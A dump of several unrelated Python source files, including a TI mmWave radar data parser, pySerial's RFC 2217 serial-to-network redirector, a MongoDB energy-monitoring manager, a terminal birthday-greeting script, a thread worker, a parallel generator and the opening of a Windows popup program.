self._thread.start()
@staticmethod
def _is_local_port_available(ip, port, raise_error=True):
"""Check whether the specified local port is available.
Borrowed from:
https://stackoverflow.com/questions/19196105/how-to-check-if-a-network-port-is-open-on-linux
"""
try:
backlog = 5
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
# See stack overflow to prevent "Only one usage" random
# errors in tests:
# https://stackoverflow.com/questions/30420512/python-socket-error-only-one-usage-of-each-socket-address-is-normally-permitted
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
sock.bind((LOCALHOST, port))
sock.listen(backlog)
except (socket.error, OSError): # pragma: no cover
if raise_error:
error_message = """Port {0} is not available.
Please specify another port for use via the 'port' parameter"""
raise RuntimeError(
error_message.format(port)
)
else:
return False
return True
def run(self):
"""TODO."""
class devnull:
write = lambda _: None # noqa: E731
ip = LOCALHOST
# Note: for credentialed or public VM use the private IP address
if self.env_name in VM_ENVS:
host_name = socket.gethostname()
ip = socket.gethostbyname(host_name)
server = WSGIServer((ip, self.port), self.app, log=devnull)
self.app.config["server"] = server
# self.app.config["CACHE_TYPE"] = "null"
server.serve_forever()
# Closes server on program exit, including freeing all sockets
def closeserver():
server.stop()
atexit.register(closeserver)
|
x8_mmw.py
|
#
# Copyright (c) 2020, Manfred Constapel
# This file is licensed under the terms of the MIT license.
#
#
# TI IWR6843 ES2.0 @ mmWave SDK demo of SDK 3.4.0.3
# TI IWR1843 ES1.0 @ mmWave SDK demo of SDK 3.4.0.3
#
import sys
import json
import serial
import threading
from lib.shell import *
from lib.helper import *
from lib.utility import *
# ------------------------------------------------
_meta_ = {
'mss': 'MMW Demo',
'dev': ('xWR18xx', 'xWR68xx',),
'ver': ('03.04.00.03', ),
'cli': 'mmwDemo:/>',
'seq': b'\x02\x01\x04\x03\x06\x05\x08\x07',
'blk': 32,
'aux': 921600,
'ant': (4, 3),
'app': {
'logMagRange': ('plot_range_profile', ), # 'capture_range_profile'),
'noiseProfile': ('plot_range_profile', ),
'detectedObjects': (), # ('plot_detected_objects', 'simple_cfar_clustering'),
'rangeAzimuthHeatMap': ('plot_range_azimuth_heat_map', ),
'rangeDopplerHeatMap': ('plot_range_doppler_heat_map', )
}
}
# ------------------------------------------------
apps = {}
verbose = False
# ------------------------------------------------
def _read_(dat, target=sys.stdout):
target.write(dat)
target.flush()
for ver in _meta_['ver']:
for dev in _meta_['dev']:
if all((tag in dat for tag in (dev, _meta_['mss'], ver))):
return dev # reset detected
if _meta_['cli'] in dat: return (None,) # cli ready
return () # unknown state
def _init_(prt, dev, cfg, dat):
aux = serial.Serial(dat, _meta_['aux'], timeout=0.01)
taux = threading.Thread(target=_data_, args=(aux,))
taux.start()
def _conf_(cfg):
global verbose
c = dict(cfg)
p = {'loglin': float('nan'), 'fftcomp': float('nan'), 'rangebias': float('nan')}
if '_comment_' in c:
c.pop('_comment_', None) # remove entry
if '_settings_' in c:
rx_ant = int(c['_settings_']['rxAntennas'])
tx_ant = int(c['_settings_']['txAntennas'])
# common
if c['channelCfg']['rxMask'] is None:
c['channelCfg']['rxMask'] = 2**rx_ant - 1
if c['channelCfg']['txMask'] is None:
n = tx_ant
if n == 1: n = 0
else: n = 2 * n
c['channelCfg']['txMask'] = 1 + n
if c['channelCfg']['cascading'] is None:
c['channelCfg']['cascading'] = 0 # always 0
# range bias for post-processing
if 'rangeBias' not in c['_settings_'] or c['_settings_']['rangeBias'] is None:
c['_settings_']['rangeBias'] = 0
# range bias for pre-processing
if 'compRangeBiasAndRxChanPhase' in c:
if c['compRangeBiasAndRxChanPhase']['rangeBias'] is None:
c['compRangeBiasAndRxChanPhase']['rangeBias'] = c['_settings_']['rangeBias']
if c['compRangeBiasAndRxChanPhase']['phaseBias'] is None or \
type(c['compRangeBiasAndRxChanPhase']['phaseBias']) == list and \
len(c['compRangeBiasAndRxChanPhase']['phaseBias']) == 0:
c['compRangeBiasAndRxChanPhase']['phaseBias'] = [1, 0] * _meta_['ant'][0] * _meta_['ant'][1]
# cli output
if 'verbose' in c['_settings_'] and c['_settings_']['verbose'] is not None:
verbose = c['_settings_']['verbose']
if c['dfeDataOutputMode']['type'] is None:
c['dfeDataOutputMode']['type'] = 1 # legacy (no subframes)
if c['adcCfg']['adcBits'] is None:
c['adcCfg']['adcBits'] = 2 # 16 bit
log_lin_scale = 1.0 / 512
if num_tx_elev_antenna(c) == 1: log_lin_scale = log_lin_scale * 4.0 / 3 # MMWSDK-439
fft_scale_comp_1d = fft_doppler_scale_compensation(32, num_range_bin(c))
fft_scale_comp_2d = 1;
fft_scale_comp = fft_scale_comp_2d * fft_scale_comp_1d
p['log_lin'], p['fft_comp'], p['range_bias'] = log_lin_scale, fft_scale_comp, c['_settings_']['rangeBias']
c.pop('_settings_', None) # remove entry
return c, p
def _proc_(cfg, par, err={1: 'miss', 2: 'exec', 3: 'plot'}):
global apps
for _, app in apps.items(): app.kill()
apps.clear()
for cmd, app in _meta_['app'].items():
if type(app) not in (list, tuple): app = (app,)
for item in app:
if cmd in cfg['guiMonitor'] and cfg['guiMonitor'][cmd] == 1 and item is not None:
if item not in apps:
apps[item], values = exec_app(item, (cfg, par, ))
if values is None: values = []
code = apps[item].poll()
if code is None:
print_log(item, values)
tapp = threading.Thread(target=_grab_, args=(item,))
tapp.start()
else:
print_log(item, values, RuntimeError(err[code]))
def _pipe_(dat):
for tag in apps:
if apps[tag] is None: continue
try:
apps[tag].stdin.write(str.encode(dat + '\n'))
apps[tag].stdin.flush()
except Exception as e:
print_log(e, sys._getframe(), tag)
apps[tag].kill()
apps[tag] = None
def _grab_(tag):
try:
while True:
line = apps[tag].stderr.readline()
if line:
line = line.decode('latin-1')
print_log(None, tag, line.strip())
except:
pass
# ------------------------------------------------
def _data_(prt): # observe auxiliary port and process incoming data
if not prt.timeout:
raise TypeError('no timeout for serial port provided')
input, output, sync, size = {'buffer': b''}, {}, False, _meta_['blk']
while True:
try:
data = prt.read(size)
input['buffer'] += data
if data[:len(_meta_['seq'])] == _meta_['seq']: # check for magic sequence
if len(output) > 0:
plain = json.dumps(output)
_pipe_(plain)
if verbose:
print(plain, file=sys.stdout, flush=True) # just print output to stdout
input['buffer'] = data
input['blocks'] = -1
input['address'] = 0
input['values'] = 0
input['other'] = {}
output = {}
sync = True # very first frame in the stream was seen
if sync:
flen = 0
while flen < len(input['buffer']): # keep things finite
flen = len(input['buffer'])
aux_buffer(input, output) # do processing of captured bytes
except serial.serialutil.SerialException:
return # leave thread
except Exception as e:
print_log(e, sys._getframe())
# ------------------------------------------------
def aux_buffer(input, output, head=40, indices={
1: 'detected_points', 2: 'range_profile', 3: 'noise_profile',
4: 'azimuth_static', 5: 'range_doppler', 6: 'stats', 7: 'side_info'}):
def aux_head(dat, n=head):
m = dat[ 0: 8] # magic
v = intify(dat[ 8:12], 10) # version
l = intify(dat[12:16]) # length
d = intify(dat[16:20], 10) # platform
f = intify(dat[20:24]) # frame number
t = intify(dat[24:28]) # cpu cycles
o = intify(dat[28:32]) # num objects
s = intify(dat[32:36]) # segements
u = intify(dat[36: n]) # subframe
return n, v, l, d, f, t, o, s, u
def aux_struct(dat, n=8):
t = intify(dat[ 0: 4])
l = intify(dat[ 4: n])
return n, t, l // 2
def aux_object(dat, oth, n=16): # detected points/objects
x = intify(dat[ 0: 4])
y = intify(dat[ 4: 8])
z = intify(dat[ 8:12])
p = intify(dat[12: n])
if x > 32767: x -= 65536
if y > 32767: y -= 65536
if z > 32767: z -= 65536
qfrac = 0
if 'qfrac' in oth: qfrac = oth['qfrac'] # q-notation is used
x = q_to_dec(x, qfrac)
y = q_to_dec(y, qfrac)
z = q_to_dec(z, qfrac)
return n, p, x, y, z
def aux_profile(dat, n=2): # value of range or noise profile
v = intify(dat[ 0: n])
return n, v
def aux_heatmap(dat, sgn, n=2): # value for heatmaps
v = intify(dat[ 0: n])
if sgn and v > 32767: v -= 65536
return n, v
def aux_info(dat, n=24): # performance measures and statistical data
ifpt = intify(dat[ 0: 4])
tot = intify(dat[ 4: 8])
ifpm = intify(dat[ 8:12])
icpm = intify(dat[12:16])
afpl = intify(dat[16:20])
ifpl = intify(dat[20: n])
return n, ifpt, tot, ifpm, icpm, afpl, ifpl
# ----------
buffer, blocks, address, values, other = \
input['buffer'], input['blocks'], input['address'], input['values'], input['other']
def progress(n, block, value):
nonlocal buffer, values, address
buffer = buffer[n:]
values -= 1
if values == 0: address = 0
try:
output[block].append(value)
except:
try:
output[block][value[0]] = value[1]
except:
output[block] = value
# ----------
# 7) point cloud side info
while address == 7 and len(buffer) >= 4 and values > 0:
buffer = buffer[4:] # TODO
values -= 1
if values == 0: address = 0
# 6) statistics (raw values)
if address == 6 and len(buffer) >= 24 and values > 0:
n, ifpt, tot, ifpm, icpm, afpl, ifpl = aux_info(buffer)
progress(n, indices[address], {
'interframe_processing': ifpt,
'transmit_output': tot,
'processing_margin': {
'interframe': ifpm,
'interchirp': icpm},
'cpu_load': {
'active_frame': afpl,
'interframe': ifpl}
})
# 5) range-doppler heatmap: entire, 2D, log mag range/Doppler array
while address == 5 and len(buffer) >= 2 and values > 0:
n, v = aux_heatmap(buffer, False)
progress(n, indices[address], v)
# 4) range-azimuth heatmap: azimuth data from the radar cube matrix
while address == 4 and len(buffer) >= 2 and values > 0:
n, v = aux_heatmap(buffer, True)
progress(n, indices[address], v)
# 3) 1D array of data considered “noise”
while address == 3 and len(buffer) >= 2 and values > 0:
n, v = aux_profile(buffer)
progress(n, indices[address], q_to_db(v))
# 2) 1D array of log mag range ffts – i.e. the first column of the log mag range-Doppler matrix
while address == 2 and len(buffer) >= 2 and values > 0:
n, v = aux_profile(buffer)
progress(n, indices[address], q_to_db(v))
# 1) point cloud
while address == 1 and len(buffer) >= 16 and values > 0:
buffer = buffer[16:] # TODO
values -= 1
if values == 0: address = 0
# ----------
# 0b) segment
if len(buffer) >= 8 and blocks > 0 and address == 0:
n, address, values = aux_struct(buffer)
buffer = buffer[n:]
blocks -= 1
if address in (1, 7):
values = output['header']['objects']
output[indices[address]] = {}
elif address in (2, 3, 4, 5):
output[indices[address]] = []
elif address in (6, ):
output[indices[address]] = None
# 0a) header
if len(buffer) >= head and blocks == -1 and address == 0 and values == 0:
n, v, l, d, f, t, o, s, u = aux_head(buffer)
buffer = buffer[n:]
blocks = s
output['header'] = {'version': v, 'length': l, 'platform': d, 'number': f, 'time': t, 'objects': o, 'blocks': s, 'subframe': u}
# ----------
input['buffer'] = buffer
input['blocks'] = blocks
input['address'] = address
input['values'] = values
input['other'] = other
|
rfc2217_server.py
|
#!/usr/bin/env python
#
# redirect data from a TCP/IP connection to a serial port and vice versa
# using RFC 2217
#
# (C) 2009-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import logging
import socket
import sys
import time
import threading
import serial
import serial.rfc2217
class Redirector(object):
def __init__(self, serial_instance, socket, debug=False):
self.serial = serial_instance
self.socket = socket
self._write_lock = threading.Lock()
self.rfc2217 = serial.rfc2217.PortManager(
self.serial,
self,
logger=logging.getLogger('rfc2217.server') if debug else None
)
self.log = logging.getLogger('redirector')
def statusline_poller(self):
self.log.debug('status line poll thread started')
while self.alive:
time.sleep(1)
self.rfc2217.check_modem_lines()
self.log.debug('status line poll thread terminated')
def shortcircuit(self):
"""connect the serial port to the TCP port by copying everything
from one side to the other"""
self.alive = True
self.thread_read = threading.Thread(target=self.reader)
self.thread_read.daemon = True
self.thread_read.name = 'serial->socket'
self.thread_read.start()
self.thread_poll = threading.Thread(target=self.statusline_poller)
self.thread_poll.daemon = True
self.thread_poll.name = 'status line poll'
self.thread_poll.start()
self.writer()
def reader(self):
"""loop forever and copy serial->socket"""
self.log.debug('reader thread started')
while self.alive:
try:
data = self.serial.read(self.serial.in_waiting or 1)
if data:
# escape outgoing data when needed (Telnet IAC (0xff) character)
self.write(serial.to_bytes(self.rfc2217.escape(data)))
except socket.error as msg:
self.log.error('%s' % (msg,))
# probably got disconnected
break
self.alive = False
self.log.debug('reader thread terminated')
def write(self, data):
"""thread safe socket write with no data escaping. used to send telnet stuff"""
with self._write_lock:
self.socket.sendall(data)
def writer(self):
"""loop forever and copy socket->serial"""
while self.alive:
try:
data = self.socket.recv(1024)
if not data:
break
self.serial.write(serial.to_bytes(self.rfc2217.filter(data)))
except socket.error as msg:
self.log.error('%s' % (msg,))
# probably got disconnected
break
self.stop()
def stop(self):
"""Stop copying"""
self.log.debug('stopping')
if self.alive:
self.alive = False
self.thread_read.join()
self.thread_poll.join()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
description="RFC 2217 Serial to Network (TCP/IP) redirector.",
epilog="""\
NOTE: no security measures are implemented. Anyone can remotely connect
to this service over the network.
Only one connection at once is supported. When the connection is terminated
it waits for the next connect.
""")
parser.add_argument('SERIALPORT')
parser.add_argument(
'-p', '--localport',
type=int,
help='local TCP port, default: %(default)s',
metavar='TCPPORT',
default=2217
)
parser.add_argument(
'-v', '--verbose',
dest='verbosity',
action='count',
help='print more diagnostic messages (option can be given multiple times)',
default=0
)
args = parser.parse_args()
if args.verbosity > 3:
args.verbosity = 3
level = (
logging.WARNING,
logging.INFO,
logging.DEBUG,
logging.NOTSET,
)[args.verbosity]
logging.basicConfig(level=logging.INFO)
#~ logging.getLogger('root').setLevel(logging.INFO)
logging.getLogger('rfc2217').setLevel(level)
# connect to serial port
ser = serial.serial_for_url(args.SERIALPORT, do_not_open=True)
ser.timeout = 3 # required so that the reader thread can exit
# reset control line as no _remote_ "terminal" has been connected yet
ser.dtr = False
ser.rts = False
logging.info("RFC 2217 TCP/IP to Serial redirector - type Ctrl-C / BREAK to quit")
try:
ser.open()
except serial.SerialException as e:
logging.error("Could not open serial port {}: {}".format(ser.name, e))
sys.exit(1)
logging.info("Serving serial port: {}".format(ser.name))
settings = ser.get_settings()
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(('', args.localport))
srv.listen(1)
logging.info("TCP/IP port: {}".format(args.localport))
while True:
try:
client_socket, addr = srv.accept()
logging.info('Connected by {}:{}'.format(addr[0], addr[1]))
client_socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
ser.rts = True
ser.dtr = True
# enter network <-> serial loop
r = Redirector(
ser,
client_socket,
args.verbosity > 0
)
try:
r.shortcircuit()
finally:
logging.info('Disconnected')
r.stop()
client_socket.close()
ser.dtr = False
ser.rts = False
# Restore port settings (may have been changed by RFC 2217
# capable client)
ser.apply_settings(settings)
except KeyboardInterrupt:
sys.stdout.write('\n')
break
except socket.error as msg:
logging.error(str(msg))
logging.info('--- exit ---')
|
DBMgr.py
|
import pymongo
import datetime
import time
import calendar
import pprint
import traceback
def add_log(msg,obj):
print("Got log:"+msg)
print(obj)
traceback.print_exc()
pymongo.MongoClient().log_db.log.insert({
"msg":msg,
"obj":obj,
"timestamp":datetime.datetime.utcnow()
});
def dump_debug_log():
return pprint.pformat(
list(pymongo.MongoClient().log_db.log.find()),
indent=2)
class DBMgr(object):
def _GetConfigValue(self,key):
try:
ret=self.config_col.find_one({"_id":key})
return ret["value"]
except:
return None
def _SetConfigValue(self,key,value):
self.config_col.replace_one({"_id":key},{"value":value},True)
def _ReadConfigs(self):
self.ROOM_DEFINITION=self._GetConfigValue("ROOM_DEFINITION")
self.APPLIANCE_DEFINITION=self._GetConfigValue("APPLIANCE_DEFINITION")
self.SAMPLING_TIMEOUT_SHORTEST=self._GetConfigValue("SAMPLING_TIMEOUT_SHORTEST")
self.SAMPLING_TIMEOUT_LONGEST=self._GetConfigValue("SAMPLING_TIMEOUT_LONGEST")
self.WATCHDOG_TIMEOUT_USER=self._GetConfigValue("WATCHDOG_TIMEOUT_USER")
self.WATCHDOG_TIMEOUT_APPLIANCE=self._GetConfigValue("WATCHDOG_TIMEOUT_APPLIANCE")
def _ConstructInMemoryGraph(self):
self.list_of_rooms={};
self.list_of_appliances={};
self.location_of_users={};
for room in self.ROOM_DEFINITION:
room["appliances"]=[]
room["users"]=[]
self.list_of_rooms[room["id"]]=room
for appliance in self.APPLIANCE_DEFINITION:
appliance["value"]=0
appliance["total_users"]=0
appliance["rooms"].sort()
self.list_of_appliances[appliance["id"]]=appliance
for roomID in appliance["rooms"]:
self.list_of_rooms[roomID]["appliances"]+=[appliance["id"]]
for room in self.ROOM_DEFINITION:
self.list_of_rooms[room["id"]]["appliances"].sort()
def _HardcodeValues(self):
if ("nwc1000m_light" in self.list_of_appliances):
self.list_of_appliances["nwc1000m_light"]["value"] = 300
if ("nwc10hallway_light" in self.list_of_appliances):
self.list_of_appliances["nwc10hallway_light"]["value"] = 100
if ("nwc10elevator_light" in self.list_of_appliances):
self.list_of_appliances["nwc10elevator_light"]["value"] = 150
if ("nwc8_light" in self.list_of_appliances):
self.list_of_appliances["nwc8_light"]["value"] = 150
if ("nwc7_light" in self.list_of_appliances):
self.list_of_appliances["nwc7_light"]["value"] = 150
if ("nwc1003b_light" in self.list_of_appliances):
self.list_of_appliances["nwc1003b_light"]["value"] = 675
if ("nwcM1_fcu" in self.list_of_appliances):
self.list_of_appliances["nwcM1_fcu"]["value"] = 930
if ("nwcM2_fcu" in self.list_of_appliances):
self.list_of_appliances["nwcM2_fcu"]["value"] = 930
if ("nwcM3_fcu" in self.list_of_appliances):
self.list_of_appliances["nwcM3_fcu"]["value"] = 930
if ("nwcM4_fcu" in self.list_of_appliances):
self.list_of_appliances["nwcM4_fcu"]["value"] = 930
if ("nwc1008_fcu" in self.list_of_appliances):
self.list_of_appliances["nwc1008_fcu"]["value"] = 550
if ("nwc1008_light" in self.list_of_appliances):
self.list_of_appliances["nwc1008_light"]["value"] = 240
if ("nwc1003b_b_plug" in self.list_of_appliances):
self.list_of_appliances["nwc1003b_b_plug"]["value"] = 93
if ("nwc1003b_c_plug" in self.list_of_appliances):
self.list_of_appliances["nwc1003b_c_plug"]["value"] = 63
if ("nwc1003t_light" in self.list_of_appliances):
self.list_of_appliances["nwc1003t_light"]["value"] = 675
if ("nwc1003d_light" in self.list_of_appliances):
self.list_of_appliances["nwc1003d_light"]["value"] = 675
def __init__(self, start_bg_thread=True):
self.dbc=pymongo.MongoClient()
self.registration_col1=self.dbc.db.registration_col1
self.ranking = self.dbc.db.ranking
self.indirectSensing = self.dbc.db.indirectSensing
self.particleSensor = self.dbc.db.particleSensor
self.suggestionsML = self.dbc.db.suggestionsML
#user registration
self.config_col=self.dbc.db.config
#metadata col
self.raw_data=self.dbc.db.raw_data
#any raw data document.
self.events_col=self.dbc.db.events_col
#any events
self.fintubeMonitor=self.dbc.db.fintubeMonitor
#save fin tube radiator data, for building modeling
self.snapshots_parameters=self.dbc.db.snapshots_parameters
self.snapshots_col_rooms=self.dbc.db.snapshots_col_rooms
self.snapshots_col_appliances=self.dbc.db.snapshots_col_appliances
self.snapshots_col_users=self.dbc.db.snapshots_col_users
#snapshot storage
self.pushManagement_push_col=self.dbc.db.pushManagement_push_col
self.pushManagement_disp_col=self.dbc.db.pushManagement_disp_col
#push management timestamp storage
self.historicalCumulativeEnergy=self.dbc.db.historicalCumulativeEnergy
self.todayCumulativeEnergy=self.dbc.db.todayCumulativeEnergy
self.humanCentricZones=self.dbc.db.humanCentricZones
self.humanCentricZonesTesting=self.dbc.db.humanCentricZonesTesting
self.recommendationTimestamps = self.dbc.db.recommendationTimestamps
self._ReadConfigs()
## Data Structure Init: bipartite graph between rooms and appls
## TODO: Add a web interface to update config in db, and pull new config into memory.
self._ConstructInMemoryGraph()
## Construct bipartite graph.
# self._accumulator()
# self._GracefulReloadGraph()
## Read appliance values from database; TODO: occupants location
self._HardcodeValues()
self.watchdogInit()
def startDaemon(self):
t=Thread(target=self._backgroundLoop,args=())
t.setDaemon(True)
t.start()
def watchdogInit(self):
self.watchdogLastSeen_User={}
self.watchdogLastSeen_Appliance={}
def SaveParameters(self, parameters):
self.snapshots_parameters.insert({
"timestamp":datetime.datetime.utcnow(),
"data":parameters
})
def ReportEnergyValue(self, applianceID, value, raw_data=None):
"maintenance tree node's energy consumption item, and update a sum value"
known_room=None
try:
if (applianceID not in self.list_of_appliances):
print("applianceID " + applianceID + " not in list of appliances.")
return
app=self.list_of_appliances[applianceID]
known_room=app["rooms"]
if value<0:
add_log("Negative value found on energy report?",{
"deviceID":applianceID,
"value":value,
"raw":raw_data
})
return
self.updateApplianceValue(app["id"], value)
except:
add_log("failed to report energy value on device",{
"known_room":known_room,
"deviceID":applianceID,
"value":value,
"raw":raw_data
})
return
def updateApplianceValue(self, applianceID, value):
self.list_of_appliances[applianceID]["value"]=int(float(value))
def constructParameterVector(self):
return
|
PyBirthdayWish.py
|
import os,random
from threading import Thread
from time import sleep
import playsound
from termcolor import colored
from config import *
import numpy as np
from PIL import Image
def get_ansi_color_code(r, g, b):
if r == g and g == b:
if r < 8:
return 16
if r > 248:
return 231
return round(((r - 8) / 247) * 24) + 232
return 16 + (36 * round(r / 255 * 5)) + (6 * round(g / 255 * 5)) + round(b / 255 * 5)
def get_color(r, g, b):
return "\x1b[48;5;{}m \x1b[0m".format(int(get_ansi_color_code(r,g,b)))
def show_image(img_path):
try:
img = Image.open(img_path)
except FileNotFoundError:
exit('Image not found.')
h = 50
w = 120
img = img.resize((w,h), Image.ANTIALIAS)
img_arr = np.asarray(img)
h,w,c = img_arr.shape
for x in range(h):
print(" "*12,end='')
for y in range(w):
pix = img_arr[x][y]
print(get_color(pix[0], pix[1], pix[2]), sep='', end='')
print()
sleep(0.15)
# Importing module specified in the config file
art = __import__(f'arts.{artFile}', globals(), locals(), ['*'])
def replaceMultiple(mainString, toBeReplace, newString):
# Iterate over the list to be replaced
for elem in toBeReplace :
# Check if the element is in the main string
if elem in mainString :
# Replace the string
mainString = mainString.replace(elem, newString)
return mainString
def resource_path(relative_path):
""" Get absolute path to resource, works for dev and for PyInstaller """
try:
# PyInstaller creates a temp folder and stores path in _MEIPASS
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
def pprint(art,time):
color_used = [random.choice(color)]
colorAttribute = []
for i in range(len(art)):
if art[i] in colorCodes:
# Color attr set to blink if 9
if art[i] == '⑨':
colorAttribute = [colorCodes[art[i]]]
# color attr none if 10
elif art[i] == '⑩':
colorAttribute = []
# Random color if R
elif art[i] == '®':
color_used = color
else:
color_used = [colorCodes[art[i]]]
print(colored(replaceMultiple(art[i],colorCodes,''),random.choice(color_used),attrs=colorAttribute),sep='', end='',flush= True);sleep(time)
show_image('./pic/km.jpg')
def pAudio():
if playAudio:
playsound.playsound(resource_path(audio), True)
# Code reader
with open(resource_path(__file__)) as f_in:
code = f_in.read()
def pcode():
# Print the code before wishing
if codePrint:
for i in range(len(code)):
print(colored(code[i], codeColor),sep='', end='',flush= True);sleep(codingSpeed)
input('\n\n'+colored('python3','blue')+colored(' PyBirthdayWish.py','yellow'))
os.system('cls' if os.name == 'nt' else 'clear')
else:
input(colored('press F11 and hit {Enter}...','blue'))
os.system('cls' if os.name == 'nt' else 'clear')
# Clearing terminal
os.system('cls' if os.name == 'nt' else 'clear')
try:
pcode()
Thread(target = pAudio).start()
Thread(target = pprint, args=(art.mainArt,speed)).start()
input()
except KeyboardInterrupt:
print(colored('\n[-] Thanks!!','red'))
os._exit(0)
|
worker.py
|
import queue
from threading import Lock
from threading import Thread
from time import sleep
from py42.exceptions import Py42ForbiddenError
from py42.exceptions import Py42HTTPError
from code42cli.errors import Code42CLIError
from code42cli.logger import get_main_cli_logger
class WorkerStats:
"""Stats about the tasks that have run."""
def __init__(self, total):
self.total = total
_total_processed = 0
_total_errors = 0
__total_processed_lock = Lock()
__total_errors_lock = Lock()
@property
def total_processed(self):
"""The total number of tasks executed."""
return self._total_processed
@property
def total_errors(self):
"""The amount of errors that occurred."""
return self._total_errors
@property
def total_successes(self):
val = self._total_processed - self._total_errors
return val if val >= 0 else 0
def __str__(self):
return "{} succeeded, {} failed out of {}".format(
self.total_successes, self._total_errors, self.total
)
def increment_total_processed(self):
"""+1 to self.total_processed"""
with self.__total_processed_lock:
self._total_processed += 1
def increment_total_errors(self):
"""+1 to self.total_errors"""
with self.__total_errors_lock:
self._total_errors += 1
class Worker:
def __init__(self, thread_count, expected_total, bar=None):
self._queue = queue.Queue()
self._thread_count = thread_count
self._stats = WorkerStats(expected_total)
self._tasks = 0
self.__started = False
self.__start_lock = Lock()
self._logger = get_main_cli_logger()
self._bar = bar
def do_async(self, func, *args, **kwargs):
"""Execute the given func asynchronously given *args and **kwargs.
Args:
func (callable): The function to execute asynchronously.
*args (iter): Positional args to pass to the function.
**kwargs (dict): Key-value args to pass to the function.
"""
if not self.__started:
with self.__start_lock:
if not self.__started:
self.__start()
self.__started = True
self._queue.put({"func": func, "args": args, "kwargs": kwargs})
self._tasks += 1
@property
def stats(self):
"""Stats about the tasks that have been executed, such as the total errors that occurred.
"""
return self._stats
def wait(self):
"""Wait for the tasks in the queue to complete. This should usually be called before
program termination."""
while self._stats.total_processed < self._tasks:
sleep(0.5)
def _process_queue(self):
while True:
try:
task = self._queue.get()
func = task["func"]
args = task["args"]
kwargs = task["kwargs"]
func(*args, **kwargs)
except Code42CLIError as err:
self._increment_total_errors()
self._logger.log_error(err)
except Py42ForbiddenError as err:
self._increment_total_errors()
self._logger.log_verbose_error(http_request=err.response.request)
self._logger.log_error(
"You do not have the necessary permissions to perform this task. "
"Try using or creating a different profile."
)
except Py42HTTPError as err:
self._increment_total_errors()
self._logger.log_verbose_error(http_request=err.response.request)
except Exception:
self._increment_total_errors()
self._logger.log_verbose_error()
finally:
self._stats.increment_total_processed()
if self._bar:
self._bar.update(1)
self._queue.task_done()
def __start(self):
for _ in range(0, self._thread_count):
t = Thread(target=self._process_queue)
t.daemon = True
t.start()
def _increment_total_errors(self):
self._stats.increment_total_errors()
|
__init__.py
|
# -*- encoding: utf-8 -*-
from __future__ import unicode_literals
import sys, os
if sys.version_info[0] < 3:
from Queue import Empty
else:
from queue import Empty
from multiprocessing import Process, Queue
class ExceptionItem(object):
def __init__(self, exception):
self.exception = exception
class ParallelGeneratorException(Exception):
pass
class GeneratorDied(ParallelGeneratorException):
pass
class ParallelGenerator(object):
def __init__(self,
orig_gen,
max_lookahead=None,
get_timeout=10):
"""
Creates a parallel generator from a normal one.
The elements will be prefetched up to max_lookahead
ahead of the consumer. If max_lookahead is None,
everything will be fetched.
The get_timeout parameter is the number of seconds
after which we check that the subprocess is still
alive, when waiting for an element to be generated.
Any exception raised in the generator will
be forwarded to this parallel generator.
"""
if max_lookahead:
self.queue = Queue(max_lookahead)
else:
self.queue = Queue()
def wrapped():
try:
for item in orig_gen:
self.queue.put(item)
raise StopIteration()
except Exception as e:
self.queue.put(ExceptionItem(e))
self.get_timeout = get_timeout
self.ppid = None # pid of the parent process
self.process = Process(target=wrapped)
self.process_started = False
def finish_if_possible(self):
"""
We can only terminate the child process from the parent process
"""
if self.ppid == os.getpid() and self.process:# and self.process.is_alive():
self.process.terminate()
self.process = None
self.queue = None
self.ppid = None
def __enter__(self):
"""
Starts the process
"""
self.ppid = os.getpid()
self.process.start()
self.process_started = True
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""
Kills the process
"""
assert self.process_started and self.ppid == None or self.ppid == os.getpid()
self.finish_if_possible()
def __next__(self):
return self.next()
def __iter__(self):
return self
def __del__(self):
self.finish_if_possible()
def next(self):
if not self.process_started:
raise ParallelGeneratorException(
"""The generator has not been started.
Please use "with ParallelGenerator(..) as g:"
""")
try:
item_received = False
while not item_received:
try:
item = self.queue.get(timeout=self.get_timeout)
item_received = True
except Empty:
# check that the process is still alive
if not self.process.is_alive():
raise GeneratorDied(
"The generator died unexpectedly.")
if type(item) == ExceptionItem:
raise item.exception
return item
except Exception:
self.finish_if_possible()
raise
|
popup.pyw
|
import os, random as rand, tkinter as tk, time, json, ctypes, pathlib, webbrowser
from tkinter import *
from tkinter import messagebox
from itertools import count, cycle
from PIL import Image, ImageTk
#Start Imported Code
#Code from: https://code.activestate.com/recipes/460509-get-the-actual-and-usable-sizes-of-all-the-monitor/
user = ctypes.windll.user32
class RECT(ctypes.Structure): #rect class for containing monitor info
_fields_ = [
('left', ctypes.c_long),
('top', ctypes.c_long),
('right', ctypes.c_long),
('bottom', ctypes.c_long)
]
def dump(self):
return map(int, (self.left, self.top, self.right, self.bottom))
class MONITORINFO(ctypes.Structure): #unneeded for this, but i don't want to rework the entire thing because i'm stupid
_fields_ = [
('cbSize', ctypes.c_ulong),
('rcMonitor', RECT),
('rcWork', RECT),
('dwFlags', ctypes.c_ulong)
]
def get_monitors():
retval = []
CBFUNC = ctypes.WINFUNCTYPE(ctypes.c_int, ctypes.c_ulong, ctypes.c_ulong, ctypes.POINTER(RECT), ctypes.c_double)
def cb(hMonitor, hdcMonitor, lprcMonitor, dwData):
r = lprcMonitor.contents
data = [hMonitor]
data.append(r.dump())
retval.append(data)
return 1
cbfunc = CBFUNC(cb)
temp = user.EnumDisplayMonitors(0, 0, cbfunc, 0)
return retval
def monitor_areas(): #all that matters from this is list(mapObj[monitor index][1])[k]; this is the list of monitor dimensions
retval = []
monitors = get_monitors()
for hMonitor, extents in monitors:
data = [hMonitor]
mi = MONITORINFO()
mi.cbSize = ctypes.sizeof(MONITORINFO)
mi.rcMonitor = RECT()
mi.rcWork = RECT()
res = user.GetMonitorInfoA(hMonitor, ctypes.byref(mi))
data.append(mi.rcMonitor.dump())
data.append(mi.rcWork.dump())
retval.append(data)
return retval
#End Imported Code
allow_scream = True
show_captions = False
has_captions = False
panic_disabled = False
extreme_mode = False
web_open = False
